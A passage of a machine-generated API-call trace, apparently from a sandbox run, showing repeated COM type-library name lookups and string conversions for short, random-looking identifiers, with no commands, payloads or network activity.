This=0x665bd20, szNameBuf="cADBBA", lHashVal=0x10da74, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.851] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.851] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.851] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="cADBBA", lHashVal=0x10da74, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.851] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82492, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cADBBA") returned 7 [0069.851] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="cADBBA", lHashVal=0x10da74, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.851] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.851] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82492 | out: _Dst=0x68767a0) returned 0x0 [0069.851] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_cADBBA") returned 0x1054de [0069.851] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_cADBBA" | out: _Dst="_B_var_cADBBA") returned 0x0 [0069.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_cADBBA") returned 14 [0069.852] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.852] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_cADBBA", lHashVal=0x1054de, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.852] IUnknown:Release (This=0x665ba50) returned 0xd [0069.852] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.852] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_cADBBA", lHashVal=0x1054de, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.852] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.852] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.852] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_cADBBA", lHashVal=0x1054de, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.852] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.852] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.852] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_cADBBA", lHashVal=0x1054de, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.852] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.852] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.852] IUnknown:Release (This=0x665ba50) returned 0xd [0069.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87193e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_cADBBA") returned 14 [0069.852] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_cADBBA", lHashVal=0x1054de, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x42004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x42004200000000, pDummy=0x0) returned 0x0 [0069.852] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82492 | out: _Dst=0x144ec0) returned 0x0 [0069.852] ITypeComp:RemoteBind (in: This=0x665ba60, szName="T1AA4414", lHashVal=0x104398, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82466, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="T1AA4414") returned 9 [0069.852] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="T1AA4414", lHashVal=0x104398, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82466, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="T1AA4414") returned 9 [0069.852] ITypeComp:RemoteBind (in: This=0x665bd30, szName="T1AA4414", lHashVal=0x104398, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.853] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="T1AA4414") returned 0x104398 [0069.853] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="T1AA4414" | out: _Dst="T1AA4414") returned 0x0 [0069.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="T1AA4414") returned 9 [0069.853] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.853] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="T1AA4414", lHashVal=0x104398, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.853] IUnknown:Release (This=0x665ba50) returned 0xd [0069.853] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.853] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="T1AA4414", lHashVal=0x104398, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.853] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.853] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.853] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="T1AA4414", lHashVal=0x104398, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.853] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.853] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.853] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="T1AA4414", lHashVal=0x104398, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.853] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82466, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="T1AA4414") returned 9 [0069.853] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="T1AA4414", lHashVal=0x104398, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.853] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0069.853] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82466 | out: _Dst=0x68767a0) returned 0x0 [0069.853] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_T1AA4414") returned 0x101b21 [0069.853] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_T1AA4414" | out: _Dst="_B_var_T1AA4414") returned 0x0 [0069.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_T1AA4414") returned 16 [0069.853] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.853] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_T1AA4414", lHashVal=0x101b21, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.853] IUnknown:Release (This=0x665ba50) returned 0xd [0069.853] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.853] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_T1AA4414", lHashVal=0x101b21, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.853] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.854] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.854] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_T1AA4414", lHashVal=0x101b21, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.854] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.854] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.854] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_T1AA4414", lHashVal=0x101b21, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.854] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.854] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.854] IUnknown:Release (This=0x665ba50) returned 0xd [0069.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87196e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_T1AA4414") returned 16 [0069.854] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_T1AA4414", lHashVal=0x101b21, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0) returned 0x0 [0069.854] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82466 | out: _Dst=0x144ec0) returned 0x0 [0069.854] ITypeComp:RemoteBind (in: This=0x665ba60, szName="oCADADG", lHashVal=0x106fb5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b824e2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="oCADADG") returned 8 [0069.854] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="oCADADG", lHashVal=0x106fb5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b824e2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="oCADADG") returned 8 [0069.854] ITypeComp:RemoteBind (in: This=0x665bd30, szName="oCADADG", lHashVal=0x106fb5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.854] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oCADADG") returned 0x106fb5 [0069.854] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="oCADADG" | out: _Dst="oCADADG") returned 0x0 [0069.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="oCADADG") returned 8 [0069.854] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.854] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="oCADADG", lHashVal=0x106fb5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.854] IUnknown:Release (This=0x665ba50) returned 0xd [0069.854] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.854] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="oCADADG", lHashVal=0x106fb5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.855] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.855] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.855] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="oCADADG", lHashVal=0x106fb5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.855] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.855] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.855] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="oCADADG", lHashVal=0x106fb5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.855] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b824e2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="oCADADG") returned 8 [0069.855] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="oCADADG", lHashVal=0x106fb5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.855] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.855] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b824e2 | out: _Dst=0x68767a0) returned 0x0 [0069.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_oCADADG") returned 0x107339 [0069.855] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_oCADADG" | out: _Dst="_B_var_oCADADG") returned 0x0 [0069.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_oCADADG") returned 15 [0069.855] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.855] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_oCADADG", lHashVal=0x107339, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.855] IUnknown:Release (This=0x665ba50) returned 0xd [0069.855] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.855] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_oCADADG", lHashVal=0x107339, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.855] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.855] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.855] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_oCADADG", lHashVal=0x107339, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.855] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.855] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.855] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_oCADADG", lHashVal=0x107339, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.855] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.855] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.855] IUnknown:Release (This=0x665ba50) returned 0xd [0069.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87199e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_oCADADG") returned 15 [0069.855] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_oCADADG", lHashVal=0x107339, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.856] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b824e2 | out: _Dst=0x144ec0) returned 0x0 [0069.856] ITypeComp:RemoteBind (in: This=0x665ba60, szName="DQkGB_", lHashVal=0x10922f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8250a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="DQkGB_") returned 7 [0069.856] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="DQkGB_", lHashVal=0x10922f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8250a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="DQkGB_") returned 7 [0069.856] ITypeComp:RemoteBind (in: This=0x665bd30, szName="DQkGB_", lHashVal=0x10922f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DQkGB_") returned 0x10922f [0069.856] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="DQkGB_" | out: _Dst="DQkGB_") returned 0x0 [0069.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="DQkGB_") returned 7 [0069.856] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.856] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="DQkGB_", lHashVal=0x10922f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.856] IUnknown:Release (This=0x665ba50) returned 0xd [0069.856] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.856] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="DQkGB_", lHashVal=0x10922f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.856] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.856] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.856] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="DQkGB_", lHashVal=0x10922f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.856] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.856] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.856] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="DQkGB_", lHashVal=0x10922f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.856] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8250a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="DQkGB_") returned 7 [0069.856] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="DQkGB_", lHashVal=0x10922f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.857] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.857] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b8250a | out: _Dst=0x68767a0) returned 0x0 [0069.857] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DQkGB_") returned 0x100c99 [0069.857] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_DQkGB_" | out: _Dst="_B_var_DQkGB_") returned 0x0 [0069.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_DQkGB_") returned 14 [0069.857] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.857] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_DQkGB_", lHashVal=0x100c99, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.857] IUnknown:Release (This=0x665ba50) returned 0xd [0069.857] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.857] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_DQkGB_", lHashVal=0x100c99, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.857] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.857] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.857] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_DQkGB_", lHashVal=0x100c99, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.857] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.857] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.857] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_DQkGB_", lHashVal=0x100c99, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.857] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.857] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.857] IUnknown:Release (This=0x665ba50) returned 0xd [0069.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8719ce, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_DQkGB_") returned 14 [0069.857] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_DQkGB_", lHashVal=0x100c99, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x42004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x42004700000000, pDummy=0x0) returned 0x0 [0069.857] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8250a | out: _Dst=0x144ec0) returned 0x0 [0069.857] ITypeComp:RemoteBind (in: This=0x665ba60, szName="boAABZDG", lHashVal=0x103e27, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82532, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="boAABZDG") returned 9 [0069.857] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="boAABZDG", lHashVal=0x103e27, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82532, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="boAABZDG") returned 9 [0069.858] ITypeComp:RemoteBind (in: This=0x665bd30, szName="boAABZDG", lHashVal=0x103e27, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, 